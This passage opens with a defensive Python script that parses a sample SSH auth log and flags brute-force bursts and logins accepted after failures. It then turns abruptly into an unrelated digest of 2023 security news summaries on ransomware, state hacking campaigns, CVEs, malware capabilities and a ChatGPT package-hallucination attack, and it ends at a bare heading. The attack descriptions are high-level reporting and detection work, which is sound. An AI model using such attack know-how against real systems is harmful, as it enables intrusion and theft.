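Jun 20 03:14:02 host1 sshd[2103]: Failed password for root from 203.0.113.7 port 51002 ssh2
Jun 20 03:14:03 host1 sshd[2104]: Failed password for root from 203.0.113.7 port 51003 ssh2
Jun 20 03:14:04 host1 sshd[2105]: Failed password for invalid user oracle from 203.0.113.7 port 51004 ssh2
Jun 20 03:14:05 host1 sshd[2106]: Accepted password for root from 203.0.113.7 port 51005 ssh2
Jun 20 03:20:00 host1 sshd[2150]: Failed password for alice from 198.51.100.9 port 40000 ssh2
Jun 20 03:20:30 host1 sshd[2151]: Accepted publickey for alice from 198.51.100.9 port 40001 ssh2
Jun 20 04:00:00 host1 sshd[2200]: Failed password for root from 192.0.2.33 port 60000 ssh2
Jun 20 04:00:01 host1 sshd[2201]: Failed password for root from 192.0.2.33 port 60001 ssh2
Jun 20 04:00:02 host1 sshd[2202]: Failed password for root from 192.0.2.33 port 60002 ssh2
Jun 20 04:00:03 host1 sshd[2203]: Failed password for root from 192.0.2.33 port 60003 ssh2
Jun 20 04:00:04 host1 sshd[2204]: Failed password for root from 192.0.2.33 port 60004 ssh2
"""

# Matches both "Failed password for invalid user X" and "Accepted publickey for X".
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$"
)


def parse(log_text, year=2023):
    """Turn auth.log text into (timestamp, ip, user, outcome, method) tuples.
    Lines that are not sshd authentication results are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["ip"], m["user"], m["outcome"], m["method"]))
    return events


def detect(events, threshold=5, window_seconds=60):
    """Flag source IPs that produce `threshold` failures inside a sliding
    `window_seconds` window (brute force, severity high) and escalate to
    critical when such a source is later granted a login: that is the point
    at which the campaign above would start dropping its payloads."""
    by_ip = defaultdict(list)
    for ev in sorted(events):  # chronological order per source
        by_ip[ev[1]].append(ev)

    findings = {}
    for ip, evs in by_ip.items():
        recent = []        # failure timestamps still inside the window
        total_failed = 0
        burst = False
        for ts, _, user, outcome, method in evs:
            if outcome == "Failed":
                total_failed += 1
                recent = [t for t in recent if (ts - t).total_seconds() <= window_seconds]
                recent.append(ts)
                if len(recent) >= threshold and not burst:
                    burst = True
                    findings[ip] = {
                        "severity": "high",
                        "reason": f"{len(recent)} failed logins within {window_seconds}s",
                    }
            elif burst:
                # A single stray failure (alice mistyping once) never sets
                # burst, so a normal login after it is not reported.
                findings[ip] = {
                    "severity": "critical",
                    "reason": f"{method} login accepted for {user!r} after {total_failed} failures",
                }
    return findings


if __name__ == "__main__":
    for ip, finding in detect(parse(SAMPLE_AUTH_LOG)).items():
        print(f"{ip}: {finding['severity']} - {finding['reason']}")
```

On the constructed sample, 203.0.113.7 is reported as critical (accepted login after five failures) and 192.0.2.33 as high, while alice's single typo from 198.51.100.9 produces no finding.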

    3CX Data Exposed, Third-Party to Blame

    3CX, a popular Voice over Internet Protocol (VoIP) comms provider, was exposed due to the negligence of a third-party vendor. The vendor's open server left instances of Elasticsearch and Kibana vulnerable, leading to the discovery of the exposed data on May 15th. This discovery came to light nearly two months after the initial cyberattacks on 3CX, which had previously been targeted by North Korean hackers. The exposed data included call metadata, license keys, and encoded database strings, posing significant risks.

    Clop Ransomware and the MOVEit Cyberattack: What to Know

    The recent Clop ransomware attack targeted the MOVEit Transfer file-transfer platform, resulting in compromised networks worldwide. The attack exploited a vulnerability in the Managed File Transfer (MFT) application using a structured query language (SQL) attack vector. The compromised platforms contained sensitive data, potentially exposing a wide range of sensitive customer information from various industries and geographies. Affected entities included U.S. government agencies, airlines, media companies, an oil giant, health services, and international consulting firms.

    New RDStealer Malware Steals From Drives Shared Over Remote Desktop

    Bitdefender Labs has discovered a cyberespionage and hacking campaign called 'RedClouds' that utilizes custom malware known as 'RDStealer' to automatically steal data from drives shared through Remote Desktop connections. The campaign has been active since at least 2020, primarily targeting systems in East Asia. While the specific threat actors behind RedClouds have not been identified, Bitdefender suggests that their interests align with China and that they possess the sophistication of a state-sponsored Advanced Persistent Threat (APT) group.

    Chinese APT15 Hackers Resurface with New Graphican Malware

    Today, the Threat Hunter Team at Symantec, part of Broadcom, reports that APT15's latest campaign targets foreign affairs ministries in Central and South American countries. The researchers report that the new Graphican backdoor is an evolution of an older malware used by the hackers rather than a tool created from scratch. It is notable for using Microsoft Graph API and OneDrive to stealthily obtain its command and control (C2) infrastructure addresses in encrypted form, giving it versatility and resistance against take-downs.

    Iowa’s Largest School District Confirms Ransomware Attack, Data Theft

    Des Moines Public Schools, Iowa's largest school district, confirmed today that a ransomware attack was behind an incident that forced it to take all networked systems offline on January 9, 2023. While the school district also received a ransom demand following the attack from an unnamed ransomware group, the ransom has not been paid. Almost 6,700 individuals whose data was affected in the resulting data breach will be contacted this week with details regarding what personal information was exposed.

    Russian APT28 Hackers Breach Ukrainian Govt Email Servers

    A cyber-espionage group known as APT28, which is associated with Russia's General Staff Main Intelligence Directorate (GRU), has successfully infiltrated Roundcube email servers belonging to various Ukrainian organizations, including government entities. This threat group, also identified as BlueDelta, Fancy Bear, Sednit, and Sofacy, took advantage of the ongoing Russia-Ukraine conflict to deceive recipients.

    ASUS Urges Customers to Patch Critical Router Vulnerabilities

    Yesterday, ASUS released firmware updates to address vulnerabilities impacting several of its router models, warning customers to update their devices or restrict WAN access until they’re secure. In total, 9 vulnerabilities were addressed, some of which have been rated high and critical in severity. The most severe of the flaws are CVE-2022-26376 and CVE-2018-1160, which have both received a 9.8 score out of 10 on the CVSS scale. CVE-2022-26376 relates to a critical memory corruption weakness in the Asuswrt firmware used in Asus routers. Successful exploitation of this flaw could enable a threat actor to trigger a denial of service or gain code execution.

    Vidar Malware Using New Tactics to Evade Detection and Anonymize Activities

    The threat actors behind the Vidar malware have made changes to their backend infrastructure, indicating attempts to retool and conceal their online trail in response to public disclosures about their modus operandi. ‘Vidar threat actors continue to rotate their backend IP infrastructure, favoring providers in Moldova and Russia,’ cybersecurity company Team Cymru said in a new analysis shared with The Hacker News. Vidar is a commercial information stealer that's known to be active since late 2018. It's also a fork of another stealer malware called Arkei and is offered for sale between $130 and $750 depending on the subscription tier. Typically delivered through phishing campaigns and sites advertising cracked software, the malware comes with a wide range of capabilities to harvest sensitive information from infected hosts.

    MOVEit Transfer Customers Warned of New Flaw as PoC Info Surfaces

    On Thursday, Progress Software disclosed yet another vulnerability in its MOVEit Transfer application, making this the third vulnerability the company has addressed since May 2023. Similar to the previous flaws (CVE-2023-34362 (May 31, 2023) and CVE-2023-35036 (June 9, 2023)), the latest vulnerability (CVE-2023-35708 (June 15, 2023)) is also a case of SQL injection and could allow threat actors to escalate privileges and potentially gain unauthorized access to MOVEit Transfer’s database.

    Rhysida Ransomware Leaks Documents Stolen From Chilean Army

    The group behind the recently emerged Rhysida ransomware operation has published online a set of documents it claims were stolen from the network of the Chilean Army (Ejército de Chile). After confirming a security incident on May 29, in which its systems were compromised over the weekend of May 27, the Chilean Army took immediate action by isolating the network. Military security experts have begun the process of restoring the affected systems. The incident was promptly reported to Chile's Computer Security Incident Response Team (CSIRT), which operates under the Joint Chiefs of Staff and the Ministry of National Defense. Shortly after the disclosure of the attack, local media reported the arrest of, and charges filed against, an Army corporal in connection with the ransomware attack.

    CISA and NSA Publish BMC Hardening Guidelines

    The US Cybersecurity and Infrastructure Security Agency (CISA) and the National Security Agency (NSA) have released joint guidance on hardening Baseboard Management Controllers (BMCs). Published this week, the document aims to address the overlooked vulnerabilities in BMCs, which can serve as potential entry points for malicious actors seeking to compromise critical infrastructure systems.

    Suspected LockBit Ransomware Affiliate Arrested, Charged in US

    Ruslan Magomedovich Astamirov, a 20-year-old Russian national from the Chechen Republic, has been arrested in Arizona and charged by the U.S. Justice Department for his alleged involvement in deploying LockBit ransomware on the networks of victims in the United States and abroad. According to the criminal complaint, Astamirov participated in a conspiracy with other members of the LockBit ransomware campaign to commit wire fraud, intentionally damage protected computers, and make ransom demands through the use of ransomware.

    Barracuda ESG Zero-Day Attacks Linked to Suspected Chinese Hackers

    The hacking group UNC4841 has been connected to data theft incidents targeting Barracuda ESG appliances. These attacks exploited a zero-day vulnerability, CVE-2023-2868, which allowed remote command injection in Barracuda’s email attachment scanning module. The vendor became aware of the vulnerability on May 19th and promptly disclosed the exploitation. CISA issued an alert urging U.S. federal agencies to apply the necessary security updates. Barracuda decided earlier this month to offer affected customers free device replacements rather than reimaging them with new firmware.

    Windows 11 KB5027231 Update Breaks Google Chrome For Malwarebytes Users

    As part of the June Patch Tuesday, Microsoft rolled out the Windows 11 22H2 KB5027231 update to fix several vulnerabilities. According to Malwarebytes, the patch is blocking Chrome from loading on updated systems running the vendor’s anti-exploit module. “On June 13, 2023, Microsoft's KB5027231 update installed on Windows 11 caused a conflict between Google Chrome and exploit protection, resulting in browser crashes,” stated Malwarebytes in an advisory.

    GravityRAT Android Trojan Steals WhatsApp Backups and Deletes Files

    An updated version of an Android remote access trojan dubbed GravityRAT has been found masquerading as messaging apps BingeChat and Chatico as part of a narrowly targeted campaign since June 2022. ‘Notable in the newly discovered campaign, GravityRAT can exfiltrate WhatsApp backups and receive commands to delete files,’ ESET researcher Lukáš Štefanko said in a new report published today.

    LockBit Ransomware Extorted $91 Million in 1,700 U.S. Attacks

    In a joint advisory, U.S. and international cybersecurity authorities have revealed that the LockBit ransomware gang has extorted approximately $91 million from U.S. organizations through around 1,700 attacks since 2020. LockBit, a Ransomware-as-a-Service (RaaS) operation, emerged as the leading global ransomware threat in 2022, with the highest number of victims reported on their data leak site.

    Russian Hackers Use PowerShell USB Malware to Drop Backdoors

    The Russian state-sponsored hacking group Gamaredon (aka Armageddon or Shuckworm) continues to target critical organizations in Ukraine's military and security intelligence sectors, employing a refreshed toolset and new infection tactics. Previously, the Russian hackers, who have been linked to the FSB, were observed using information-stealers against Ukrainian state organizations, employing new variants of their "Pteranodon" malware, and also using a default Word template hijacker for new infections. Symantec's threat research team, part of Broadcom, reports today that the threat actors have recently begun using USB malware to propagate to additional systems inside infected networks.

    Unveiling the Balada Injector: A Malware Epidemic in WordPress

    In April 2023, credible sources such as Bleeping Computer and TechRadar began disseminating alarming accounts of cybercriminals who ingeniously breached WordPress websites. Exploiting vulnerabilities in the widely used plugins Elementor Pro Premium (webpage builder) and WooCommerce (online storefront), these malicious actors gained unauthorized access with devastating consequences.

    Microsoft June 2023 Patch Tuesday fixes 78 flaws, 38 RCE bugs

    As part of the June Patch Tuesday, Microsoft addressed 78 flaws which include 17 Elevation of Privilege Vulnerabilities, 3 Security Feature Bypass Vulnerabilities, 32 Remote Code Execution Vulnerabilities, 5 Information Disclosure Vulnerabilities, 10 Denial of Service Vulnerabilities, 10 Spoofing Vulnerabilities, and 1 Edge - Chromium Vulnerability. Out of the 78 flaws fixed, 6 have been rated critical in severity, 63 rated Important, 2 rated moderate, and 1 rated low in severity.

    Fake Zero-Day PoC Exploits on GitHub Push Windows, Linux malware

    Hackers are impersonating cybersecurity researchers on Twitter and GitHub to publish fake proof-of-concept exploits for zero-day vulnerabilities that infect Windows and Linux with malware. These malicious exploits are promoted by alleged researchers at a fake cybersecurity company named 'High Sierra Cyber Security,' who promote the GitHub repositories on Twitter, likely to target cybersecurity researchers and firms involved in vulnerability research. The repositories appear legitimate, and the users who maintain them impersonate real security researchers from Rapid7, and other security firms, even using their headshots.

    Gozi Host 'Virus' Sentenced to 3 Years in US Prison

    Mihai Ionut Paunescu, a 39-year-old Romanian national, has been sentenced to 36 months in a U.S. federal prison for his role in hosting the digital infrastructure used for banking Trojans that led to the theft of tens of millions of dollars. He pleaded guilty to conspiring to commit computer intrusion with the intent to defraud. Paunescu, also known as "Virus," played a critical role in providing the necessary IT infrastructure, which involved renting IP addresses and relocating customer data to different networks and IP addresses to avoid detection by law enforcement.

    Researchers Uncover XSS Vulnerabilities in Azure Services

    Cybersecurity experts at Orca Security have identified two critical cross-site scripting (XSS) vulnerabilities in Microsoft Azure services. The vulnerabilities are related to an identified weakness in the postMessage iframe. Abusing this flaw could expose Azure users to potential security breaches. These vulnerabilities were found in both Azure Bastion and the Azure Container Registry, which are two commonly used services in the Azure ecosystem.

    UK Communications Regulator Ofcom Hacked With a Moveit File Transfer Zero-Day

    The UK’s communications regulator, Ofcom, revealed a data breach caused by a Clop ransomware attack. Exploiting a zero-day vulnerability in the MOVEit file transfer system, the attackers successfully infiltrated Ofcom’s infrastructure. “A limited amount of information about certain companies we regulate – some of it confidential – along with personal data of 412 Ofcom employees, was downloaded during the attack,” an Ofcom spokesperson told The Record.

    Massive Phishing Campaign Uses 6,000 Sites to Impersonate 100 Brands

    A widespread brand impersonation campaign targeting over a hundred popular apparel, footwear, and clothing brands has been underway since June 2022, tricking people into entering their account credentials and financial information on fake websites. The brands impersonated by the phony sites include Nike, Puma, Asics, Vans, Adidas, Columbia, Superdry, Converse, Casio, Timberland, Salomon, Crocs, Skechers, The North Face, UGG, Guess, Caterpillar, New Balance, Fila, Doc Martens, Reebok, Tommy Hilfiger, and others. According to Bolster's threat research team, who discovered the campaign, it relies on at least 3,000 domains and roughly 6,000 sites, including inactive ones.

    Microsoft: Azure Portal Outage Was Caused by Traffic "Spike"

    Microsoft revealed in an update to the Azure status page that the preliminary root cause behind an outage that impacted the Azure Portal worldwide on Friday was what it described as a traffic "spike." Customers who wanted to access the Azure Portal on Friday afternoon at portal.azure[.]com reported issues connecting and seeing a warning saying,

    RDP Honeypot Targeted 3.5 Million Times in Brute-force Attacks

    Researchers using a Remote Desktop Protocol honeypot found that exposed connections are so attractive to attackers that they were targeted around 37,000 times a day from various IP addresses. The attacks are completely automated, but once the right access credentials are found via brute-forcing, hackers manually begin looking for important or sensitive files.

    Microsoft Warns of Multi-Stage AiTM Phishing and BEC Attacks

    Microsoft researchers have issued a warning about a new form of cyber attack known as "adversary-in-the-middle" (AiTM) phishing and business email compromise (BEC), specifically targeting banking and financial institutions. These attacks involve threat actors creating a proxy server that sits between a user and their desired website. The proxy server, controlled by the attackers, intercepts and captures the user's password and session cookie, allowing the attackers to gain unauthorized access to sensitive information.

    Ukrainian Hackers Take Down Service Provider for Russian Banks

    A group of Ukrainian hackers known as the Cyber.Anarchy.Squad claimed an attack that took down Russian telecom provider Infotel JSC on Thursday evening. Among other things, Moscow-based Infotel provides connectivity services between the Russian Central Bank and other Russian banks, online stores, and credit institutions.

    Xplain Data Breach Also Impacted the National Swiss Railway FSS

    The Play ransomware attack suffered by the IT services provider Xplain has proven to be worse than initially estimated. The incident has also impacted the national railway company of Switzerland (FSS) and the canton of Aargau. In early June, Swiss police initiated an investigation into the cyber attack that targeted Xplain, a Bernese IT company providing services to various federal and cantonal government departments, the army, customs, and the Federal Office of Police (Fedpol).

    Nova Scotia Health Says 100,000 Affected by MOVEit Hack

    The personal information of approximately 100,000 Nova Scotia Health employees was unlawfully obtained by hackers who exploited a zero-day vulnerability in Progress Software's MOVEit managed file transfer application. The recent disclosure made by the women's and children's health center is a sign that other healthcare organizations may also announce data breaches caused by ransomware hackers who exploited a previously fixed vulnerability in the software.

    Kimsuky Targets Think Tanks and News Media with Social Engineering Attacks

    Researchers at SentinelOne have uncovered a new Kimsuky-backed social-engineering campaign targeting experts in North Korean affairs to steal Google and subscription credentials for NK News, an American-based news website that provides analysis and news focusing on North Korea. In the latest campaign, the group was observed sending emails impersonating Chad O’Carroll, the founder of NK News. The emails request victims to review a draft article analyzing the nuclear threat posed by North Korea. If the victim replies to the email, Kimsuky sends a follow-up email containing a spoofed URL to a Google document, designed to redirect the target to a malicious website crafted to capture Google credentials.

    Researchers Published PoC Exploit Code for Actively Exploited Windows Elevation of Privilege Issue

    The Microsoft Windows vulnerability CVE-2023-29336 (CVSS score 7.8) is an elevation of privilege issue that resides in the Win32k component. Win32k.sys is a system driver file in the Windows operating system. The driver is responsible for providing the interface between user-mode applications and the Windows graphical subsystem. The vulnerability is actively exploited in attacks. The issue can be chained with a code execution bug to spread malware. The vulnerability was reported by researchers Jan Vojtěšek, Milánek, and Luigino Camastra from antivirus firm Avast. The researchers believe this flaw was used as part of an exploit chain to deliver malware.

    Clop Ransomware Likely Testing MOVEit Zero-day Since 2021

    The Clop ransomware gang has been looking for ways to exploit a now-patched zero-day in the MOVEit Transfer managed file transfer (MFT) solution since 2021, according to Kroll security experts. While analyzing logs on some clients' compromised networks during the investigation of recent Clop data theft attacks targeting vulnerable MOVEit Transfer instances, they found malicious activity matching the method used by the gang to deploy the newly discovered LemurLoot web shell.

    Hacking Group Seen Mixing Cybercrime and Cyberespionage

    Researchers suggest that a hacking collective, believed to have connections to the Belarusian government, is blending cybercrime activities with cyberespionage. Referred to as Asylum Ambuscade, this group has been identified as "a cybercrime group that engages in some cyberespionage activities on the side" since 2020, as stated in a recent report by cybersecurity firm ESET, authored by malware researcher Matthieu Faou.

    Royal Ransomware Gang Adds BlackSuit Encryptor to Their Arsenal

    The Royal ransomware gang has begun testing a new encryptor called BlackSuit that shares many similarities with the operation's usual encryptor. Since late April, there have been rumbles that the Royal ransomware operation was getting ready to rebrand under a new name. This escalated further after they began to feel pressure from law enforcement after they attacked the City of Dallas, Texas. A new BlackSuit ransomware operation was discovered in May that used its own branded encryptor and Tor negotiation sites.

    Cisco Fixes AnyConnect Bug Giving Windows SYSTEM Privileges

    Cisco recently addressed a high-severity flaw in its Cisco Secure Client software that could allow threat actors to escalate privileges to the SYSTEM account used by the operating system. “Cisco Secure Client enables employees to work from anywhere via a secure Virtual Private Network (VPN) and provides admins with endpoint management and telemetry features.”

    Barracuda Says Hacked ESG Appliances Must be Replaced Immediately

    Email and network security company Barracuda warns customers they must replace Email Security Gateway (ESG) appliances hacked in attacks targeting a now-patched zero-day vulnerability. "Impacted ESG appliances must be immediately replaced regardless of patch version level," the company warned in a Tuesday update to the initial advisory. "Barracuda's remediation recommendation at this time is full replacement of the impacted ESG."

    Researchers Spot a Different Kind of Magecart Card-Skimming Campaign

    A cybercriminal affiliated with the Magecart group has successfully infected an undisclosed number of e-commerce websites across the United States, United Kingdom, and five other countries with malware designed to skim credit card numbers and personally identifiable information (PII) from unsuspecting individuals who engage in online purchases on these platforms. However, a novel twist in this malicious campaign involves the exploitation of the same compromised websites as hosts for distributing the card-skimming malware to other targeted sites.

    Outlook Hit By Outages as Hacktivists Claim DDoS Attacks

    Outlook.com is suffering a series of outages today after being down multiple times yesterday, with hacktivists known as Anonymous Sudan claiming to perform DDoS attacks on the service. This outage follows two major outages yesterday, creating widespread disruptions for global Outlook users, preventing users worldwide from reliably accessing or sending email and using the mobile Outlook app.

    NASA Website Flaw Jeopardizes Astrobiology Fans

    The open redirect vulnerability plaguing NASA's Astrobiology website was independently discovered by the Cybernews research team. Upon finding the flaw, it was revealed that a researcher from an open bug bounty program had already identified it a few months earlier on January 14th, 2023. However, the agency failed to address and fix the vulnerability, exposing global users to risks until May 2023. Attackers could have exploited the flaw to redirect unsuspecting users to malicious websites, luring them into providing sensitive data such as login credentials and credit card numbers.

    New ChatGPT Attack Technique Spreads Malicious Packages

    A new cyber-attack technique using the OpenAI language model ChatGPT has emerged, allowing attackers to spread malicious packages in developers' environments. Vulcan Cyber's Voyager18 research team described the discovery in an advisory published today. "We've seen ChatGPT generate URLs, references and even code libraries and functions that do not actually exist. These large language model (LLM) hallucinations have been reported before and may be the result of old training data," explains the technical write-up by researcher Bar Lanyado and contributors Ortal Keizman and Yair Divinsky.

    New ‘Powerdrop’ Powershell Malware Targets U.S. Aerospace Industry

    A new PowerShell malware called "PowerDrop" specifically targets the U.S. aerospace defense industry. The cybersecurity firm Adlumin found a sample of this malware in the network of a defense contractor in the U.S. PowerDrop utilizes PowerShell and Windows Management Instrumentation (WMI) to establish a persistent remote access trojan (RAT) within the compromised networks. The tactics employed by the malware fall somewhere between "off-the-shelf" malware and sophisticated advanced persistent threat (APT) techniques. Based on the timing and targets of the attacks, it is highly probable that the perpetrator behind the malware is a state-sponsored entity.

    Cyclops Ransomware Gang Offers Go-Based Info Stealer to Cybercriminals

    Threat actors associated with the Cyclops ransomware have been observed offering an information stealer malware that's designed to capture sensitive data from infected hosts. ‘The threat actor behind this [ransomware-as-a-service] promotes its offering on forums,’ Uptycs said in a new report. ‘There it requests a share of profits from those engaging in malicious activities using its malware.’ The Go-based stealer, for its part, is designed to target Windows and Linux systems, capturing details such as operating system information, computer name, number of processes, and files of interest matching specific extensions.

    Google Fixes New Chrome Zero-Day Flaw With Exploit in the Wild

    Yesterday, Google released security updates to address a zero-day flaw in its Chrome web browser. Tracked as CVE-2023-3079, the bug has been assessed as a high-severity issue and is related to a type confusion bug in the Chrome V8 JavaScript engine. “Type confusion bugs arise when the engine misinterprets the type of an object during runtime, potentially leading to malicious memory manipulation and arbitrary code execution.”

    Iowa Reports Third Big Vendor Breach This Year

    The state government of Iowa has recently reported its third major health data breach since April, all involving third-party vendors. The most recent breach occurred at dental health insurer MCNA Insurance Co., with the Iowa Department of Health and Human Services disclosing that hackers compromised the protected health information of nearly 234,000 Iowa residents.

    Alarming Surge in TrueBot Activity Revealed with New Delivery Vectors

    VMware’s Carbon Black Managed Detection and Response (MDR) team saw a surge in TrueBot activity in May 2023. TrueBot is a botnet that has been active since 2017 and is linked to the Silence group, a cybercriminal group that is known for targeting banks and financial institutions, in addition to the education sector. According to VMware’s MDR team, TrueBot has been under active development by Silence, with the latest versions now leveraging a Netwrix vulnerability (CVE-2022-31199, CVSS score: 9.8) as a delivery vector.

    Microsoft Links Clop Ransomware Gang to MOVEit Data-Theft Attacks

    On Sunday night, Microsoft's Threat Intelligence team tweeted that they have linked the recent attacks that exploit a zero-day vulnerability in the MOVEit Transfer platform to the Clop ransomware gang, which is also known as Lace Tempest. This particular gang has gained a reputation for conducting ransomware operations and managing the Clop extortion site. BleepingComputer was the first to report last Thursday that threat actors have been exploiting a previously unknown vulnerability in MOVEit Transfer servers to illicitly obtain data from targeted organizations.

    Zyxel Shares Tips on Protecting Firewalls From Ongoing Attacks

    Zyxel has published a security advisory containing guidance on protecting firewall and VPN devices from ongoing attacks and detecting signs of exploitation. This warning comes in response to multiple reports of widespread exploitation of CVE-2023-28771, and to the exploitability and severity of CVE-2023-33009 and CVE-2023-33010, all of which impact Zyxel VPN and firewall devices.

    New Linux Ransomware BlackSuit is Similar to Royal Ransomware

    Royal ransomware was one of the most notable ransomware families of 2022, and it made headlines again in early May 2023 with the attack against the IT systems of the city of Dallas, Texas. The human-operated Royal ransomware first appeared on the threat landscape in September 2022 and has demanded ransoms of up to millions of dollars.

    Toyota Admits to Yet Another Cloud Leak

    Toyota, the automobile manufacturer, apologized for leaking customer records online due to a misconfigured cloud environment. This is the second time Toyota has apologized for a cloud leak in recent weeks. The company said the leak was caused by "insufficient dissemination and enforcement of data handling rules." Toyota said there is no evidence that the data has been misused.

    Camaro Dragon Strikes with New TinyNote Backdoor for Intelligence Gathering

    The Chinese nation-state group known as Camaro Dragon has been linked to yet another backdoor that's designed to meet its intelligence-gathering goals. Israeli cybersecurity firm Check Point, which dubbed the Go-based malware TinyNote, said it functions as a first-stage payload capable of ‘basic machine enumeration and command execution via PowerShell or Goroutines.’ What the malware lacks in sophistication, it makes up for in establishing redundant methods to retain access to the compromised host, by means of multiple persistence tasks and varied methods of communicating with different servers.

    Malicious Chrome Extensions With 75M Installs Removed From Web Store

    Google has removed from the Chrome Web Store 32 malicious extensions that could alter search results and push spam or unwanted ads. Collectively, they come with a download count of 75 million. The extensions featured legitimate functionality to keep users unaware of the malicious behavior that came in obfuscated code to deliver the payloads. Cybersecurity researcher Wladimir Palant analyzed the PDF Toolbox extension (2 million downloads) available from Chrome Web Store and found that it included code that was disguised as a legitimate extension API wrapper.

    New Horabot Campaign Takes Over Victim’s Gmail, Outlook Accounts

    A previously unknown campaign involving the Horabot botnet malware has targeted Spanish-speaking users in Latin America since at least November 2020, infecting them with a banking trojan and spam tool. The malware enables the operators to take control of the victim's Gmail, Outlook, Hotmail, or Yahoo email accounts, steal email data and 2FA codes arriving in the inbox, and send phishing emails from the compromised accounts. The new Horabot operation was discovered by analysts at Cisco Talos, who report that the threat actor behind it is likely based in Brazil. The multi-stage infection chain begins with a tax-themed phishing email sent to the target, with an HTML attachment that is supposedly a payment receipt. Opening the HTML launches a URL redirection chain that lands the victim on an HTML page hosted on an attacker-controlled AWS instance.

    Top 3 API Security Risks and How to Mitigate Them

    The application programming interface (API) is an unsung hero of the digital revolution. It provides the glue that sticks together diverse software components in order to create new user experiences. But in providing a direct path to back-end databases, APIs are also an attractive target for threat actors. It doesn’t help that they have exploded in number over recent years, leading many deployments to go undocumented and unsecured. According to one recent study, 94% of global organizations have experienced API security problems in production over the past year with nearly a fifth (17%) suffering an API-related breach. It’s time to gain visibility and control of these digital building blocks.

    New MOVEit Transfer Zero-Day Mass-Exploited in Data Theft Attacks

    Cybercriminals are taking advantage of a zero-day vulnerability in the MOVEit Transfer software. This vulnerability allows them to illicitly obtain data from targeted organizations. MOVEit Transfer is a managed file transfer (MFT) software designed by Ipswitch, a subsidiary of Progress Software Corporation based in the United States. It facilitates secure file transfers between enterprises, business partners, and customers using protocols like SFTP, SCP, and HTTP-based uploads.

    SpinOk Trojan Compromises 421 Million Android Devices

    Security researchers have recently detected a novel Android Trojan that has the potential to compromise a staggering 421 million devices. In a recently released advisory on Monday, the Doctor Web team revealed details about this Trojan, referred to as Android[.]Spy.SpinOk. Android[.]Spy.SpinOk possesses numerous spyware capabilities, such as gathering files and capturing clipboard content. This Trojan spreads by being concealed within other applications, thereby infecting a vast number of devices.

    Experts Warn of Backdoor-like Behavior Within Gigabyte Systems

    This should be treated as High severity if you are a user of Gigabyte systems. We may upgrade this to Critical should reports of active exploitation occur.

    Researchers from firmware security firm Eclypsium have discovered suspected backdoor-like behavior within Gigabyte systems. The experts found that the firmware in Gigabyte systems drops and executes a Windows native executable during the system startup process. The executable is used for insecure downloading and execution of additional payloads. The experts pointed out that this is the same behavior observed in other OEM backdoor-like features such as the Computrace backdoor (a.k.a. LoJack DoubleAgent) and in firmware implants such as Sednit LoJax, MosaicRegressor, and Vector-EDK.

    Hackers Exploit Critical Zyxel Firewall Flaw in Ongoing Attacks

    A critical command injection flaw in Zyxel networking devices is being exploited by hackers in widespread attacks to install malware. Tracked as CVE-2023-28771, the flaw resides in the default configuration of impacted firewall and VPN devices and can be abused to perform unauthenticated remote code execution via a specially crafted IKEv2 packet sent to UDP port 500 on the impacted device.

    Improved BlackCat Ransomware Strikes with Lightning Speed and Stealthy Tactics

    The threat actors behind BlackCat ransomware have come up with an improved variant that prioritizes speed and stealth in an attempt to bypass security guardrails and achieve their goals. The new version, dubbed Sphynx and announced in February 2023, packs a ‘number of updated capabilities that strengthen the group's efforts to evade detection,’ IBM Security X-Force said in a new analysis. The ‘product’ update was first highlighted by vx-underground in April 2023. Trend Micro, last month, detailed a Linux version of Sphynx that's ‘focused primarily on its encryption routine.’

    Dark Pink Hackers Continue to Target Govt and Military Organizations

    In 2023, the Dark Pink APT hacking group remains highly active, focusing its attacks on government, military, and education organizations in Indonesia, Brunei, and Vietnam. This threat group has been operational since around mid-2021, primarily concentrating its efforts on targets in the Asia-Pacific region. However, it was only in January 2023 that the group gained public attention following a report by Group-IB. According to the researchers, a thorough analysis of the group's past activities has revealed further instances of breaches.

    Microsoft Details Critical Apple macOS Vulnerability Allowing SIP Protection Bypass

    Researchers at Microsoft, Jonathan Bar Or, Michael Pearse, and Anurag Bohra, recently disclosed details of a now-patched flaw in Apple macOS that could be exploited by threat actors with root access to bypass security enforcements and perform arbitrary actions on unpatched devices. Tracked as CVE-2023-32369 (aka ‘Migraine’), the flaw could permit actors to bypass a security feature dubbed System Integrity Protection (SIP), which is designed to limit the actions a root user can perform on protected files and folders. By abusing this flaw, “an attacker can create files that are protected by SIP and therefore undeletable by ordinary means.”

    Human Error Fuels Industrial APT Attacks, Kaspersky Reports

    “Cybersecurity firm Kaspersky has identified the primary factors contributing to advanced persistent threat (APT) attacks in industrial sectors. The first of them, discussed in a new report published today, is the absence of isolation in operational technology (OT) networks” (Info Security Magazine, 2023). Kaspersky observed engineering workstations being connected to both the IT and OT networks. Previously air-gapped OT/ICS environments are more commonly being connected to the Internet.

    Gouda Hacker: Charges Tie to Ransomware Hit Affecting Cheese

    Prosecutors have accused Mikhail Matveev, 31, a Russian national, of wielding not one but three strains of ransomware. Two federal indictments unsealed this month accuse Matveev - aka Wazawaka, m1x, Boriselcin, Uhodiransomwar - of operating as an affiliate for the LockBit, Babuk and Hive ransomware groups. Security experts say the indictments are notable because they don't target ransomware-as-a-service group chiefs but rather a foot soldier who was directly responsible for hacking into victims' networks and using the ransomware to extort them.

    Beware of the New Phishing Technique “File Archiver in the Browser” That Exploits Zip Domains

    Phishers have devised a novel phishing technique known as "file archiver in the browser" that capitalizes on victims visiting a .ZIP domain. This method involves emulating a file archiver software within a web browser, as revealed by security researcher mr.d0x. Recently, Google introduced eight additional top-level domains (TLDs), including .zip and .mov. However, cybersecurity professionals are cautioning about potential malicious activities associated with these domains.

    New Hacking Forum Leaks Data of 478,000 RaidForums Members

    A database for the notorious RaidForums hacking forums has been leaked online, allowing threat actors and security researchers insight into the people who frequented the forum. RaidForums was a very popular and notorious hacking and data leak forum known for hosting, leaking, and selling data stolen from breached organizations. Threat actors who frequented the forum would hack into websites or access exposed database servers to steal customer information.

    Invoice and CEO Scams Dominate Fraud Impacting Businesses

